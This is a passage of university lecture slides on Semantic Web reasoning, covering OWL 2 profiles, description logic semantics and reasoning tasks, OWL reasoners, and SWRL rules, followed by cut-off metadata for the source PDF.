2. \(\#S^G(z, C) > n\) and there are two \(S\)-neighbours \(x, y\) of \(z\) with \(C \in \mathcal{L}(x) \cap \mathcal{L}(y)\) and not \(x \not\approx y\), then 1. if \(x\) is a nominal node then Merge\((y, x)\)
2. else, if \(y\) is a nominal node or an ancestor of \(x\) then Merge\((x, y)\)
3. else Merge\((y, x)\)
\(\circ\)-rule: if \(\circ\) for some \(o \in N_I\) there are 2 nodes \(x, y\) with \(o \in \mathcal{L}(x) \cap \mathcal{L}(y)\) and not \(x \not\approx y\), then Merge\((x, y)\)
\(NN\)-rule: if 1. \((\leq n S.C) \in \mathcal{L}(x)\), \(x\) is a nominal node, and there is a blockable \(S\)-neighbour \(y\) of \(x\) such that \(C \in \mathcal{L}(y)\) and \(x\) is a successor of \(y\),
2. there is no \(m\) such that \(1 \leq m \leq n\), \((\leq m S.C) \in \mathcal{L}(x)\), and there exist \(m\) nominal \(S\)-neighbours \(z_1, \ldots, z_m\) of \(x\) with \(C \in \mathcal{L}(z_i)\) and \(z_i \not\approx z_j\) for all \(1 \leq i < j \leq m\), then 1. guess \(m\) with \(1 \leq m \leq n\), and set \(\mathcal{L}(x) = \mathcal{L}(x) \cup \{(\leq m S.C)\}\)
2. create \(m\) new nodes \(y_1, \ldots, y_m\) with \(\mathcal{L}(\langle x, y_i \rangle) = \{S\}, \mathcal{L}(y_i) = \{C, o_i\}\), for each \(o_i \in N_I\) new in \(G\), and \(y_i \not\approx y_j\) for \(1 \leq i < j \leq m\).
OWL2 profiles
- Decidable does not mean efficient nor convenient
- OWL 2 profiles are sub-languages (i.e. syntactic subsets) of OWL 2 that offer important advantages in particular application scenarios
- Three different profiles are defined
- OWL 2 EL, OWL 2 QL, OWL 2 RL
- Each profile is a **syntactic** restriction of the OWL 2 Structural Specification, i.e., as a subset of the structural elements that can be used in a conforming ontology, and each is **more restrictive than OWL DL**
- Each of the profiles trades off different aspects of OWL **expressive power** in return for different computational and/or implementation **benefits**
OWL Profiles
OWL2 profiles
• OWL 2 EL "Existential quantification Language"
– Enables **polynomial** time algorithms for all the standard reasoning tasks
– It is particularly suitable for applications where very large ontologies are needed, and where expressive power can be traded for performance guarantees
• OWL 2 QL "Query Language"
– Enables **conjunctive queries** to be answered in LogSpace (more precisely, AC0) using standard relational database technology
– It is particularly suitable for applications where relatively lightweight ontologies are used to organize large numbers of individuals and where it is useful or necessary to access the data directly via relational queries (e.g., SQL)
OWL2 profiles
- **OWL 2 RL "Rule Language"
- Enables the implementation of polynomial time reasoning algorithms using rule-extended database technologies operating directly on RDF triples
- It is particularly suitable for applications where relatively lightweight ontologies are used to organize large numbers of individuals and where it is useful or necessary to operate directly on data in the form of RDF triples
- Any OWL 2 EL, QL or RL ontology is, of course, also an OWL 2 ontology and can be interpreted using either the Direct or RDF-Based Semantics
OWL2 semantics and profiles overview
- **OWL 2 Full**: Undecidable
- **OWL 2 DL**: 2NExpTime-Complete
- **OWL 2 QL**: In AC0
- **OWL 2 RL**: PTime-Complete
- **OWL 2 EL**: NExpTime-Complete
- **OWL 1 DL**: SHOIN
OWL2-EL characteristics
• Ontologies with complex structural descriptions, huge numbers of classes, heavy use of classification, application of the resulting terminology to vast amounts of data
• Expressive class expression language, no restrictions on how they may be used in axioms
• Fairly expressive property expressions, including property chains, but excluding inverse
• Forbidden: negation, disjunction, universal quantification on properties, all kinds of role inverses
https://www.w3.org/TR/owl2-primer/
OWL 2 EL Feature Overview
OWL 2 EL places restrictions on the type of class restrictions that can be used in axioms. In particular, the following types of class restrictions are supported:
- existential quantification to a class expression (ObjectSomeValuesFrom) or a data range (DataSomeValuesFrom)
- existential quantification to an individual (ObjectHasValue) or a literal (DataHasValue)
- self-restriction (ObjectHasSelf)
- enumerations involving a single individual (ObjectOneOf) or a single literal (DataOneOf)
- intersection of classes (ObjectIntersectionOf) and data ranges (DataIntersectionOf)
OWL 2 EL supports the following axioms, all of which are restricted to the allowed set of class expressions:
- class inclusion (SubClassOf)
- class equivalence (EquivalentClasses)
- class disjointness (DisjointClasses)
- object property inclusion (SubObjectPropertyOf) with or without property chains, and data property inclusion (SubDataPropertyOf)
- property equivalence (EquivalentObjectProperties and EquivalentDataProperties),
- transitive object properties (TransitiveObjectProperty)
- reflexive object properties (ReflexiveObjectProperty)
- domain restrictions (ObjectPropertyDomain and DataPropertyDomain)
- range restrictions (ObjectPropertyRange and DataPropertyRange)
- assertions (SameIndividual, DifferentIndividuals, ClassAssertion, ObjectPropertyAssertion, DataPropertyAssertion, NegativeObjectPropertyAssertion, and NegativeDataPropertyAssertion)
- functional data properties (FunctionalDataProperty)
- keys (HasKey)
The following constructs are not supported in OWL 2 EL:
- universal quantification to a class expression (ObjectAllValuesFrom) or a data range (DataAllValuesFrom)
- cardinality restrictions (ObjectMaxCardinality, ObjectMinCardinality, ObjectExactCardinality, DataMaxCardinality, DataMinCardinality, and DataExactCardinality)
- disjunction (ObjectUnionOf, DisjointUnion, and DataUnionOf)
- class negation (ObjectComplementOf)
- enumerations involving more than one individual (ObjectOneOf and DataOneOf)
- disjoint properties (DisjointObjectProperties and DisjointDataProperties)
- irreflexive object properties (IrreflexiveObjectProperty)
- inverse object properties (InverseObjectProperties)
- functional and inverse-functional object properties (FunctionalObjectProperty and InverseFunctionalObjectProperty)
- symmetric object properties (SymmetricObjectProperty)
- asymmetric object properties (AsymmetricObjectProperty)
https://www.w3.org/TR/owl2-profiles
OWL2-QL characteristics
- Can represent key features of Entity-relationship and UML diagrams, suitable for representing database schemas and for integrating them via query rewriting
- Can also be used directly as a high level database schema language
- Captures many commonly used features in RDFS and small extensions (such as inverse properties and subproperty hierarchies)
- Restricts class axioms asymmetrically
- **Forbidden**: existential quantification of roles to a class expression, property chain axioms and equality
https://www.w3.org/TR/owl2-primer/
OWL2-QL Feature Overview
OWL 2 QL is defined not only in terms of the set of supported constructs, but it also restricts the places in which these constructs are allowed to occur. The allowed usage of constructs in class expressions is summarized in Table 1.
<table>
<thead>
<tr>
<th>Subclass Expressions</th>
<th>Superclass Expressions</th>
</tr>
</thead>
<tbody>
<tr>
<td>a class existential quantification (ObjectSomeValuesFrom)</td>
<td>a class intersection (ObjectIntersectionOf)</td>
</tr>
<tr>
<td>where the class is limited to owl:Thing existential quantification to a data range (DataSomeValuesFrom)</td>
<td>negation (ObjectComplementOf) existential quantification to a data range (DataSomeValuesFrom)</td>
</tr>
</tbody>
</table>
OWL 2 QL supports the following axioms, constrained so as to be compliant with the mentioned restrictions on class expressions:
- subclass axioms (SubClassOf)
- class expression equivalence (EquivalentClasses)
- class expression disjointness (DisjointClasses)
- inverse object properties (InverseObjectProperties)
- property inclusion (SubObjectPropertyOf not involving property chains and SubDataPropertyOf)
- property equivalence (EquivalentObjectProperties and EquivalentDataProperties)
- property domain (ObjectPropertyDomain and DataPropertyDomain)
- property range (ObjectPropertyRange and DataPropertyRange)
- disjoint properties (DisjointObjectProperties and DisjointDataProperties)
- symmetric properties (SymmetricObjectProperty)
- reflexive properties (ReflexiveObjectProperty)
- irreflexive properties (IrreflexiveObjectProperty)
- asymmetric properties (AsymmetricObjectProperty)
- assertions other than individual equality assertions and negative property assertions (DifferentIndividuals, ClassAssertion, ObjectPropertyAssertion, and DataPropertyAssertion)
The following constructs are not supported in OWL 2 QL:
- existential quantification to a class expression or a data range (ObjectSomeValuesFrom and DataSomeValuesFrom) in the subclass position
- self-restriction (ObjectHasSelf)
- existential quantification to an individual or a literal (ObjectHasValue, DataHasValue)
- enumeration of individuals and literals (ObjectOneOf, DataOneOf)
- universal quantification to a class expression or a data range (ObjectAllValuesFrom, DataAllValuesFrom)
- cardinality restrictions (ObjectMaxCardinality, ObjectMinCardinality, ObjectExactCardinality, DataMaxCardinality, DataMinCardinality, DataExactCardinality)
- disjunction (ObjectUnionOf, DisjointUnion, and DataUnionOf)
- property inclusions (SubObjectPropertyOf, involving property chains)
- functional and inverse-functional properties (FunctionalObjectProperty, InverseFunctionalProperty, and FunctionalDataProperty)
- transitive properties (TransitiveObjectProperty)
- keys (HasKey)
- individual equality assertions and negative property assertions
OWL 2 QL does not support individual equality assertions (SameIndividual): adding such axioms to OWL 2 QL would increase the data complexity of query answering, so that it is no longer first order rewriteable, which means that query answering could not be implemented directly using relational database technologies. However, an ontology O that includes individual equality assertions, but is otherwise OWL 2 QL, could be handled by computing the reflexive–symmetric–transitive closure of the equality (SameIndividual) relation in O (this requires answering recursive queries and can be implemented in \text{LOGSPACE} w.r.t. the size of data) [7a, litute-book], and then using this relation in query answering procedures to simulate individual equality reasoning [Automated Reasoning].
https://www.w3.org/TR/owl2-profiles
OWL2-RL characteristics
- For applications that require scalable reasoning without sacrificing too much expressive power
- Designed to be as expressive as possible while allowing implementation using rules and a rule-processing system (only conjunctive rules)
- We cannot (easily) talk about unknown individuals in our superclass expressions
- Disallows statements where the existence of an individual enforces the existence of another individual
- Restricts class axioms asymmetrically
https://www.w3.org/TR/owl2-primer/
OWLS2-RL Feature Overview
Restricting the way in which constructs are used makes it possible to implement reasoning systems using rule-based reasoning engines, while still providing desirable computational guarantees. These restrictions are designed so as to avoid the need to infer the existence of individuals not explicitly present in the knowledge base, and to avoid the need for nondeterministic reasoning. This is achieved by restricting the use of constructs to certain syntactic positions. For example in subclass axioms, the constructs in the subclass and superclass expressions must follow the usage patterns shown in Table 2.
<table>
<thead>
<tr>
<th>Subclass Expressions</th>
<th>Superclass Expressions</th>
</tr>
</thead>
<tbody>
<tr>
<td>a class other than owl:Thing</td>
<td>a class other than owl:Thing</td>
</tr>
<tr>
<td>an enumeration of individuals (ObjectOneOf)</td>
<td>intersection of classes (ObjectIntersectionOf)</td>
</tr>
<tr>
<td>intersection of class expressions (ObjectIntersectionOf)</td>
<td>negation (ObjectComplementOf)</td>
</tr>
<tr>
<td>union of class expressions (ObjectUnionOf)</td>
<td>universal quantification to a class expression (ObjectAllValuesFrom)</td>
</tr>
<tr>
<td>existential quantification to a class expression (ObjectSomeValuesFrom)</td>
<td>existential quantification to an individual (ObjectHasValue)</td>
</tr>
<tr>
<td>existential quantification to a data range (DataSomeValuesFrom)</td>
<td>at-most 0/1 cardinality restriction to a class expression (ObjectMaxCardinality 0/1)</td>
</tr>
<tr>
<td>existential quantification to an individual (ObjectHasValue)</td>
<td>universal quantification to a data range (DataSomeValuesFrom)</td>
</tr>
<tr>
<td>existential quantification to a literal (DataHasValue)</td>
<td>existential quantification to a literal (DataHasValue)</td>
</tr>
</tbody>
</table>
All axioms in OWL2 RL are constrained in a way that is compliant with these restrictions. Thus, OWL 2 RL supports all axioms of OWL 2 apart from disjoint unions of classes (DisjointUnion) and reflexive object property axioms (ReflexiveObjectProperty).
https://www.w3.org/TR/owl2-profiles
28/01/2019 01RRDIU - Semantic Web
Outline
• Automated Reasoning
• OWL Semantics and Profiles
• **Reasoning with Description Logics**
• SWRL
Description Logics: Syntax
- Concepts corresponds to classes
- Roles correspond to class properties
- Constructors mix of set notation and FO quantification
Booleans: \( C \cap D, C \cup D, \neg C \)
Qualified quantification: \( \forall R.C, \exists R.C \)
- Variable free notation for concepts (classes)
- \( \text{artist}(x) = \text{person}(x) \land \exists y \text{ created}(x, y) \land \text{Artwork}(y) \)
is written as \( \text{Artist}\_\text{Person} \cap \exists \text{created. Artwork} \)
Description Logic: Semantics
- Interpretations are pairs \((\Delta, \cdot^\mathcal{I})\), with a universe \(\Delta\) and a mapping \(\mathcal{I}\) from
- concept names to subsets of \(\Delta\)
- role names to binary relations
- Booleans:
\[
\begin{align*}
C \sqcap D & \quad (C \sqcap D)^\mathcal{I} = C^\mathcal{I} \cap D^\mathcal{I} \\
C \sqcup D & \quad (C \sqcup D)^\mathcal{I} = C^\mathcal{I} \cup D^\mathcal{I} \\
\neg C & \quad (\neg C)^\mathcal{I} = \Delta \setminus C^\mathcal{I}
\end{align*}
\]
Qualified quantification:
\[
\begin{align*}
\forall R.C & \quad \forall R.C^\mathcal{I} = \{x \in \Delta \mid \forall y \in \Delta : R^\mathcal{I}(x, y) \rightarrow y \in C^\mathcal{I}\} \\
\exists R.C & \quad \exists R.C^\mathcal{I} = \{x \in \Delta \mid \exists y \in \Delta : R^\mathcal{I}(x, y) \& y \in C^\mathcal{I}\}
\end{align*}
\]
# Modular Definition of Description Logics
<table>
<thead>
<tr>
<th>Constructor</th>
<th>Syntax</th>
<th>Semantics</th>
</tr>
</thead>
<tbody>
<tr>
<td>concept name</td>
<td>$C$</td>
<td>$C^I$</td>
</tr>
<tr>
<td>conjunction</td>
<td>$C_1 \sqcap C_2$</td>
<td>$C_1^I \cap C_2^I$</td>
</tr>
<tr>
<td>univ. quant.</td>
<td>$\forall R.C$</td>
<td>${d_1 \mid \forall d_2 \in \Delta^I. (R^I d_1 d_2 \rightarrow d_2 \in C^I)}$</td>
</tr>
<tr>
<td>top</td>
<td>$\top$</td>
<td>$\Delta^I$</td>
</tr>
<tr>
<td>negation ($C$)</td>
<td>$\neg C$</td>
<td>$\Delta^I \setminus C^I$</td>
</tr>
<tr>
<td>disjunction ($U$)</td>
<td>$C_1 \sqcup C_2$</td>
<td>$C_1^I \cup C_2^I$</td>
</tr>
<tr>
<td>exist. quant. ($\exists$)</td>
<td>$\exists R.C$</td>
<td>${d_1 \mid \exists d_2 \in \Delta^I. (R^I d_1 d_2 \land d_2 \in C^I)}$</td>
</tr>
<tr>
<td>number restr. ($N$)</td>
<td>$\geq nR$</td>
<td>${d_1 \mid</td>
</tr>
<tr>
<td></td>
<td>$\leq nR$</td>
<td>${d_1 \mid</td>
</tr>
<tr>
<td>one-of ($O$)</td>
<td>${a_1, \ldots, a_n}$</td>
<td>${d \mid d = a_i^I \text{ for some } a_i}$</td>
</tr>
<tr>
<td>filler ($B$)</td>
<td>$\exists R.{a}$</td>
<td>${d \mid d = R^I da^I}$</td>
</tr>
<tr>
<td>role name</td>
<td>$R$</td>
<td>$R^I$</td>
</tr>
<tr>
<td>role conj. ($R$)</td>
<td>$R_1 \sqcap R_2$</td>
<td>$R_1^I \cap R_2^I$</td>
</tr>
<tr>
<td>inverse roles ($T$)</td>
<td>$R^{-1}$</td>
<td>${(d_1, d_2) \mid R^I (d_2, d_1)}$</td>
</tr>
</tbody>
</table>
Reasoning
- With the definition of the semantics, we may now define some reasoning methods
- Reasoning on the structure of the ontology
- Reasoning on relationships among classes
- Reasoning on instances
Concept Reasoning
Based on these semantics there are two basic reasoning services:
- **Concept satisfiability**, $\models C \neq \bot$.
- Check whether for some interpretation $\mathcal{I}$ we have $C^\mathcal{I} \neq \emptyset$.
- $\models \forall \text{creates.} \text{Sculpture} \implies \exists \text{creates.} (\text{Artwork} \implies \neg \text{Sculpture}) = \bot$.
- **Concept subsumption**, $\models C_1 \subseteq C_2$.
- Check whether for all interpretations $\mathcal{I}$ we have $C_{1}^{\mathcal{I}} \subseteq C_{2}^{\mathcal{I}}$.
- $\forall \text{creates.} \text{Painting} \implies \exists \text{creates.} \top \subseteq \exists \text{creates.} \text{Painting}$.
Terminological Reasoning
\[ \mathcal{T} = \{ \text{Painting} \sqsubseteq \text{Artwork} \cap \neg \text{Sculpture}, \]
\[ \text{Painter} \sqsubseteq \exists \text{creates}. \text{Paintings}, \]
\[ \text{Sculpturer} \sqsubseteq \exists \text{creates}. \text{Artwork} \cap \forall \text{creates}. \text{Sculpture} \} \]
- **Concept satisfiability**, \( \Sigma \models C \neq \bot \).
- Check whether there is an interpretation \( \mathcal{I} \) such that \( \mathcal{I} \models \Sigma \)
and \( C^\mathcal{I}_1 \subseteq C^\mathcal{I}_2 \).
- **Concept unsatisfiability**: \( \Sigma \models \text{Painter} \cap \text{Sculpturer} = \bot \).
- **Subsumption**, \( \Sigma \models C_1 \sqsubseteq C_2 \).
- Check whether for all interpretations \( \mathcal{I} \) such that \( \mathcal{I} \models \Sigma \) we have \( C^\mathcal{I}_1 \subseteq C^\mathcal{I}_2 \).
- **Subsumption**: \( \Sigma \models \text{Painter} \sqsubseteq \neg \text{Sculpurer} \)
Assertional reasoning
\[ \mathcal{A} = \{ \text{rembrandt:Artist}, \text{nightwatch:Painting}, (\text{rembrandt,nightwatch}):\text{created} \} \]
\[ \text{and } \Sigma = \langle \mathcal{T}, \mathcal{A} \rangle \]
- **Consistency**, \( \Sigma \not\models \bot \).
- Check whether there exists \( \mathcal{I} \) such that \( \mathcal{I} \models \Sigma \).
- \( \Sigma \models \mathcal{A} \neq \bot \) but \( \Sigma \models \mathcal{A} \cup \{ \text{rembrandt:Sculptor} \} = \bot \)
- **Instance Checking**, \( \Sigma \models a : C \).
- Check whether \( a^\mathcal{I} \in C^\mathcal{I} \) for all interpretations \( \mathcal{I} \models \Sigma \).
- \( \text{rembrandt} \in \Sigma \text{Painter} \).
- **Defined reasoning tasks**:
- **Retrieval**: \( \text{retrieve(Artists)} = \{ \text{rembrandt} \} \).
- **Realization**: find most specific concepts in \( \mathcal{T} \) for instances in \( \mathcal{A} \).
- \( \text{realize(rembrandt)} = \text{Painter} \)
What is an OWL-DL reasoner
- The official normative definition:
- An *OWL consistency checker* takes a document as input, and returns one word being Consistent, Inconsistent, or Unknown. [J. J. Carroll, J. D. Roo, OWL Web Ontology Language Test Cases, W3C Recommendation http://www.w3.org/TR/owl-test/ (2004).]
- Rather restrictive... and not very useful for ontology development, debug and querying
## DL Jargon
<table>
<thead>
<tr>
<th>Abbr.</th>
<th>Stands for</th>
<th>Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>ABox</td>
<td>Assertional Box</td>
<td>Component that contains assertions about individuals, i.e. OWL facts such as type, property-value, equality or inequality assertions.</td>
</tr>
<tr>
<td>TBox</td>
<td>Terminological Box</td>
<td>Component that contains axioms about classes, i.e. OWL axioms such as subclass, equivalent class or disjointness axioms.</td>
</tr>
<tr>
<td>KB</td>
<td>Knowledge Base</td>
<td>A combination of an ABox and a TBox, i.e. a complete OWL ontology.</td>
</tr>
</tbody>
</table>
Classical Types of Logic Inference
- **Consistency checking**, which ensures that an ontology does not contain any contradictory facts.
- The OWL Abstract Syntax & Semantics document [S&AS] provides a formal definition of ontology consistency that Pellet uses.
- In DL terminology, this is the operation to check the consistency of an ABox with respect to a TBox.
- Equivalent to OWL Consistency Checking
Classical Types of Logic Inference
- **Concept satisfiability**, which checks if it is possible for a class to have any instances. If class is unsatisfiable, then defining an instance of the class will cause the whole ontology to be inconsistent.
Classical Types of Logic Inference
- **Classification**, which computes the subclass relations between every named class to create the complete class hierarchy. The class hierarchy can be used to answer queries such as getting all or only the direct subclasses of a class.
Classical Types of Logic Inference
- **Realization**, which finds the most specific classes that an individual belongs to; or in other words, computes the direct types for each of the individuals. Realization can only be performed after classification since direct types are defined with
Some OWL reasoners
- **Fact++**
- **Hermit**
- **Kaon2**
- **Pellet 2.0**
- **RacerPro**
- **Vampire**
Outline
- Automated Reasoning
- OWL Semantics and Profiles
- Reasoning with Description Logics
- SWRL
Semantic Web Rule Language (SWRL)
- Not an official W3C Recommendation
- Application to OWL of the RuleML (http://ruleml.org/) languages
- Extends OWL language by providing Horn clauses
- Defines an extension of the OWL model-theoretic semantics
SWRL structure
• The rules are of the form of an implication between an antecedent (body) and consequent (head).
• The intended meaning can be read as:
– whenever the conditions specified in the antecedent hold,
– then the conditions specified in the consequent must also hold.
General structure
• Both the antecedent (body) and consequent (head) consist of zero or more atoms.
– An **empty antecedent** is treated as trivially **true** (i.e. satisfied by every interpretation), so the consequent must also be satisfied by every interpretation;
– an **empty consequent** is treated as trivially **false** (i.e., not satisfied by any interpretation), so the antecedent must also not be satisfied by any interpretation.
• Multiple atoms are treated as a **conjunction**
Rule structure
• A SWRL rule contains an antecedent part, which is referred to as the *body*, and a consequent part, which is referred to as the *head*.
• Both the body and head consist of positive conjunctions of *atoms*:
\[- \text{atom} \land \text{atom} \ldots \rightarrow \text{atom} \land \text{atom}\]
• SWRL does not support negated atoms or disjunction.
Atoms
- Atoms in these rules can be of the form
- $C(x)$, where $C$ is an OWL description (class)
- $P(x,y)$, where $P$ is an OWL property
- `sameAs(x,y)`
- `differentFrom(x,y)`
- where $x, y$ are either variables, OWL individuals or OWL data values
Atoms
• \( p(\text{arg1}, \text{arg2}, \ldots \text{Argn}) \)
• \( p \) is a predicate symbol
– OWL classes, properties or data types
• \( \text{arg1}, \text{arg2}, \ldots, \text{argn} \) are the terms or arguments of the expression
– OWL individuals or data values,
– variables referring to them
• All variables in SWRL are treated as universally quantified
Atom types
• Class Atoms
– Person(?p)
– Man(Fred)
• Individual Property atoms
– hasBrother(?x, ?y)
– hasSibling(Fred, ?y)
• Data Valued Property atoms
– hasAge(?x, ?age)
– hasHeight(Fred, ?h)
– hasAge(?x, 232)
– hasName(?x, "Fred")
• Different Individuals atoms
– differentFrom(?x, ?y)
– differentFrom(Fred, Joe)
• Same Individual atoms
– sameAs(?x, ?y)
– sameAs(Fred, Freddy)
• Built-in atoms
– Runtime-provided functions
– Core built-ins in swrlb:
• Data Range atoms
Syntax issues
• SWRL rules are defined according to different syntax forms
– Abstract syntax (in functional form)
– XML concrete syntax
– RDF concrete syntax
– Human-readable form (using logic predicates)
Example: uncle
- **Human-readable syntax**
- `hasParent(?x1,?x2) ∧ hasBrother(?x2,?x3) --> hasUncle(?x1,?x3)`
- **Abstract syntax**
- `Implies(Antecedent(`
`hasParent(I-variable(x1) I-variable(x2))`
`hasBrother(I-variable(x2) I-variable(x3)))`
`Consequent(`
`hasUncle(I-variable(x1) I-variable(x3)))`)`
- **Example**: if John has Mary as a parent and Mary has Bill as a brother then John has Bill as an uncle
Example: inheritance
• Human-readable syntax
– Student(?x1) -> Person(?x1)
• Abstract syntax
– Implies(Antecedent(Student(I-variable(x1))))
Consequent(Person(I-variable(x1))))
• This is an improper usage of rules: it should be expressed directly in OWL, to make the information also available to an OWL reasoner
– SubClassOf(Student Person)
Example: propagating properties
• **Human-readable syntax**
- Artist(?x) ^ artistStyle(?x,?y) & Style(?y) ^ creator(?z,?x) -> style/period(?z,?y)
• **Abstract syntax**
- Implies(Antecedent(
Artist(I-variable(x))
artistStyle(I-variable(x) I-variable(y))
Style(I-variable(y))
creator(I-variable(z) I-variable(x)))
Consequent(style/period(I-variable(z) I-variable(y))))
• **Meaning:** the style of an art object is the same as the style of the creator
SWRL versus OWL
- The last example may not be described in OWL
- In OWL, you declare relationships between Classes
- Such relationships are intended to apply on instances
- You may add properties to instances to materialize such relationships
- OWL Inference only supports “for all” or “exists” in propagating properties
- In OWL you may not express “that specific instance that has such properties”!
OWL versus SWRL
• OWL has a declarative nature, while SWRL is more operational
– Even if the semantics extends that of OWL, practical reasoners just “apply the rules”
• The consistency of the rules application relies on the rule designer’s infinite wisdom
• Example: If a property is declared as symmetric, then we must be careful to create all property instances to satisfy that
SWRL in Protege
- Enable "SWRL Tab"
- Uses the "Drools" rule engine
- 3-step process:
- OWL + Rules transferred to Drools
- Running Drools
- Inferred statements transferred back to OWL (optional)
References
• Course material for “Practical Reasoning for the Semantic Web” course at the 17th European Summer School in Logic, Language and Information (ESSLLI)
References
• OWL Web Ontology Language: Semantics and Abstract Syntax – W3C Recommendation 10 February 2004 [S&AS]
– http://www.w3.org/TR/owl-semantics/
• OWL 2 Web Ontology Language Profiles (Second Edition)
– https://www.w3.org/TR/owl2-profiles/
• OWL 2 Web Ontology Language Primer (Second Edition)
– https://www.w3.org/TR/owl2-primer/
References (SWRL)
• SWRL API in Protégé
– https://github.com/protegeproject/swrlapi/wiki
• SWRL Language FAQ
– https://github.com/protegeproject/swrlapi/wiki/SWRLLanguageFAQ
License
• This work is licensed under the Creative Commons “Attribution-NonCommercial-ShareAlike Unported (CC BY-NC-SA 3.0)” License.
• You are free:
– to Share - to copy, distribute and transmit the work
– to Remix - to adapt the work
• Under the following conditions:
– Attribution - You must attribute the work in the manner specified by the author or licensor (but not in any way that suggests that they endorse you or your use of the work).
– Noncommercial - You may not use this work for commercial purposes.
– Share Alike - If you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.
• To view a copy of this license, visit http://creativecommons.org/license/by-nc-sa/3.0/
|
{"Source-Url": "https://elite.polito.it/files/courses/01RRDIU/2019/6-SemanticReasoning.pdf", "len_cl100k_base": 10922, "olmocr-version": "0.1.53", "pdf-total-pages": 64, "total-fallback-pages": 0, "total-input-tokens": 92613, "total-output-tokens": 13477, "length": "2e13", "weborganizer": {"__label__adult": 0.00043845176696777344, "__label__art_design": 0.0012226104736328125, "__label__crime_law": 0.001132965087890625, "__label__education_jobs": 0.005001068115234375, "__label__entertainment": 0.0002613067626953125, "__label__fashion_beauty": 0.0002620220184326172, "__label__finance_business": 0.0010442733764648438, "__label__food_dining": 0.0005221366882324219, "__label__games": 0.0015401840209960938, "__label__hardware": 0.0006427764892578125, "__label__health": 0.00049591064453125, "__label__history": 0.000518798828125, "__label__home_hobbies": 0.0002357959747314453, "__label__industrial": 0.0008749961853027344, "__label__literature": 0.002010345458984375, "__label__politics": 0.0005712509155273438, "__label__religion": 0.0008335113525390625, "__label__science_tech": 0.1756591796875, "__label__social_life": 0.0003383159637451172, "__label__software": 0.057037353515625, "__label__software_dev": 0.748046875, "__label__sports_fitness": 0.000286102294921875, "__label__transportation": 0.0006628036499023438, "__label__travel": 0.00024068355560302737}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 39088, 0.01319]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 39088, 0.63651]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 39088, 0.71233]], "google_gemma-3-12b-it_contains_pii": [[0, 19, false], [19, 122, null], [122, 501, null], [501, 845, null], [845, 1198, null], [1198, 1412, null], [1412, 1634, null], [1634, 1772, null], [1772, 2225, null], [2225, 2421, null], [2421, 2439, null], [2439, 2929, null], [2929, 3040, null], [3040, 3372, null], [3372, 3928, null], [3928, 4427, null], [4427, 5634, null], [5634, 7083, null], [7083, 11023, null], [11023, 11669, null], [11669, 11682, null], [11682, 12381, null], [12381, 12945, null], [12945, 13158, null], [13158, 13673, null], [13673, 16176, null], [16176, 16740, null], [16740, 20359, null], [20359, 20883, null], [20883, 23149, null], [23149, 23256, null], [23256, 23762, null], [23762, 24629, null], [24629, 26608, null], [26608, 26819, null], [26819, 27506, null], [27506, 28467, null], [28467, 29446, null], [29446, 29851, null], [29851, 30345, null], [30345, 30757, null], [30757, 31005, null], [31005, 31279, null], [31279, 31568, null], [31568, 32146, null], [32146, 32249, null], [32249, 32496, null], [32496, 32780, null], [32780, 33276, null], [33276, 33641, null], [33641, 33902, null], [33902, 34268, null], [34268, 34772, null], [34772, 34986, null], [34986, 35416, null], [35416, 35768, null], [35768, 36242, null], [36242, 36646, null], [36646, 37029, null], [37029, 37232, null], [37232, 37790, null], [37790, 38138, null], [38138, 38318, null], [38318, 39088, null]], "google_gemma-3-12b-it_is_public_document": [[0, 19, true], [19, 122, null], [122, 501, null], [501, 845, null], [845, 1198, null], [1198, 1412, null], [1412, 1634, null], [1634, 1772, null], [1772, 2225, null], [2225, 2421, null], [2421, 2439, null], [2439, 2929, null], [2929, 3040, null], [3040, 3372, null], [3372, 3928, null], [3928, 4427, null], [4427, 5634, null], [5634, 7083, null], [7083, 11023, null], [11023, 11669, null], [11669, 11682, null], [11682, 12381, null], [12381, 12945, null], [12945, 13158, null], [13158, 13673, null], [13673, 16176, null], [16176, 16740, null], [16740, 20359, null], [20359, 20883, null], [20883, 23149, null], [23149, 23256, null], [23256, 23762, null], [23762, 24629, null], [24629, 26608, null], [26608, 26819, null], [26819, 27506, null], [27506, 28467, null], [28467, 29446, null], [29446, 29851, null], [29851, 30345, null], [30345, 30757, null], [30757, 31005, null], [31005, 31279, null], [31279, 31568, null], [31568, 32146, null], [32146, 32249, null], [32249, 32496, null], [32496, 32780, null], [32780, 33276, null], [33276, 33641, null], [33641, 33902, null], [33902, 34268, null], [34268, 34772, null], [34772, 34986, null], [34986, 35416, null], [35416, 35768, null], [35768, 36242, null], [36242, 36646, null], [36646, 37029, null], [37029, 37232, null], [37232, 37790, null], [37790, 38138, null], [38138, 38318, null], [38318, 39088, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 39088, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, true], [5000, 39088, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 39088, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 39088, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 39088, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 39088, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 39088, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 39088, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 39088, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 39088, null]], "pdf_page_numbers": [[0, 19, 1], [19, 122, 2], [122, 501, 3], [501, 845, 4], [845, 1198, 5], [1198, 1412, 6], [1412, 1634, 7], [1634, 1772, 8], [1772, 2225, 9], [2225, 2421, 10], [2421, 2439, 11], [2439, 2929, 12], [2929, 3040, 13], [3040, 3372, 14], [3372, 3928, 15], [3928, 4427, 16], [4427, 5634, 17], [5634, 7083, 18], [7083, 11023, 19], [11023, 11669, 20], [11669, 11682, 21], [11682, 12381, 22], [12381, 12945, 23], [12945, 13158, 24], [13158, 13673, 25], [13673, 16176, 26], [16176, 16740, 27], [16740, 